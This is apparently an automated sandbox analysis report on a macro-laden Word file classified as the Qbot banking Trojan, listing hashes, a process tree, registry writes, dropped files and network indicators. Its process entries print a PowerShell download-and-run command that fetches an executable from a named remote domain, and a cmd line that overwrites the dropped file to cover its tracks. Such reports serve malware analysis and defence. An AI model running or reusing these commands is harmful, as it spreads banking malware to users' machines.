File name: | 103_1.doc |
Full analysis: | https://app.any.run/tasks/f71e10ba-dbac-4109-894a-fee84f76cab3 |
Verdict: | Malicious activity |
Threats: | Qbot is a banking Trojan — a malware designed to collect banking information from victims. Qbot targets organizations mostly in the US. It is equipped with various sophisticated evasion and info-stealing functions and worm-like functionality, and a strong persistence mechanism. |
Analysis date: | October 10, 2019, 12:36:08 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 0248698A84AAA0A8E35C85A10E572E7B |
SHA1: | 111FC5557F71DF41F6BF5BE7BAB3C94156697305 |
SHA256: | F623BBEEEA89387F78FAF0F39FC1D2F082EEE57683929657D652326FFB06D4D2 |
SSDEEP: | 6144:YeHJBKC3WqnzVSFHcVxz3r4JtEz2i+ze/K:YePh3WmzVz4jEzVE |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
Description: | - |
---|---|
Creator: | - |
ModifyDate: | 2019:10:08 15:29:00Z |
---|---|
CreateDate: | 2019:10:04 06:50:00Z |
RevisionNumber: | 83 |
LastModifiedBy: | Пользователь Windows |
AppVersion: | 14 |
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 41 |
LinksUpToDate: | No |
Company: | - |
Manager: | Poligraph |
TitlesOfParts: | |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 36 |
Words: | 6 |
Pages: | 1 |
TotalEditTime: | 1.1 days |
Template: | Normal.dotm |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1747 |
ZipCompressedSize: | 464 |
ZipCRC: | 0xd8a131a1 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2308 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\103_1.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 Modules
| |||||||||||||||
1748 | cmd /c c:\Helperes\HerttipoldbhrtnZFzdgg5474565746346.bat | C:\Windows\system32\cmd.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2968 | powershell -Command (New-Object Net.WebClient).DownloadFile('http://adaptivecontentdevelopment.com/content/08C18A99C61C04B26A11115E910E2691/godz/4fzas.exe', 'c:\Helperes\Gerilax.exe') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3328 | cmd /c c:\Helperes\BJKGJGyfyghu675785674786.bat | C:\Windows\system32\cmd.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
520 | powershell Start-Process -FilePath c:\Helperes\Gerilax.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2580 | "C:\Helperes\Gerilax.exe" | C:\Helperes\Gerilax.exe | powershell.exe | ||||||||||||
User: admin Company: Helios Software Solutions Integrity Level: MEDIUM Description: TextPad Exit code: 0 Version: 4.5 Modules
| |||||||||||||||
2552 | C:\Helperes\Gerilax.exe /C | C:\Helperes\Gerilax.exe | — | Gerilax.exe | |||||||||||
User: admin Company: Helios Software Solutions Integrity Level: MEDIUM Description: TextPad Exit code: 0 Version: 4.5 Modules
| |||||||||||||||
4072 | C:\Users\admin\AppData\Roaming\Microsoft\Zulycjadyc\ytfovlym.exe | C:\Users\admin\AppData\Roaming\Microsoft\Zulycjadyc\ytfovlym.exe | — | Gerilax.exe | |||||||||||
User: admin Company: Helios Software Solutions Integrity Level: MEDIUM Description: TextPad Exit code: 0 Version: 4.5 Modules
| |||||||||||||||
2156 | "C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Helperes\Gerilax.exe" | C:\Windows\System32\cmd.exe | Gerilax.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
4008 | ping.exe -n 6 127.0.0.1 | C:\Windows\system32\PING.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (2308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | vqb |
Value: 7671620004090000010000000000000000000000 | |||
(PID) Process: | (2308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1041 |
Value: Off | |||
(PID) Process: | (2308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1046 |
Value: Off | |||
(PID) Process: | (2308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1036 |
Value: Off | |||
(PID) Process: | (2308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1031 |
Value: Off | |||
(PID) Process: | (2308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1040 |
Value: Off | |||
(PID) Process: | (2308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1049 |
Value: Off | |||
(PID) Process: | (2308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 3082 |
Value: Off | |||
(PID) Process: | (2308) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1330249790 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2308 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA9F6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2968 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\131X6EWF1XV1YUSSHSOE.temp | — | |
MD5:— | SHA256:— | |||
520 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VLVGAYUPQX9FE1FJAGC5.temp | — | |
MD5:— | SHA256:— | |||
2308 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFB02626B021E69BCA.TMP | — | |
MD5:— | SHA256:— | |||
2580 | Gerilax.exe | C:\Users\admin\AppData\Roaming\Microsoft\Zulycjadyc\ytfovlym.exe | executable | |
MD5:EB1CA89D672F014E1888C36A94A958EF | SHA256:B50ADABD94F7FE3FEB4954C02F4B74DCC4F5610DEA5A09CA8D38F7BD5DD5F835 | |||
520 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2968 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2968 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39d079.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2308 | WINWORD.EXE | C:\Helperes\BJKGJGyfyghu675785674786.bat | text | |
MD5:A1BCAC0E58AB980D5A6544C31117AAB6 | SHA256:E3FADB1688D51F71D058930330482B3A0F90D54966B22DCADAD0201A99F46E0F | |||
2308 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D3E45E9E34C71A48C10FD945E9620BAF | SHA256:6CC7603DD408465CD9F4E0ED479443E49C34BDBCC43DE9FD1A9A1A1B8185537F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2968 | powershell.exe | GET | 200 | 166.62.28.102:80 | http://adaptivecontentdevelopment.com/content/08C18A99C61C04B26A11115E910E2691/godz/4fzas.exe | US | executable | 749 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2968 | powershell.exe | 166.62.28.102:80 | adaptivecontentdevelopment.com | GoDaddy.com, LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
adaptivecontentdevelopment.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
— | — | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
— | — | Misc activity | ET INFO EXE - Served Attached HTTP |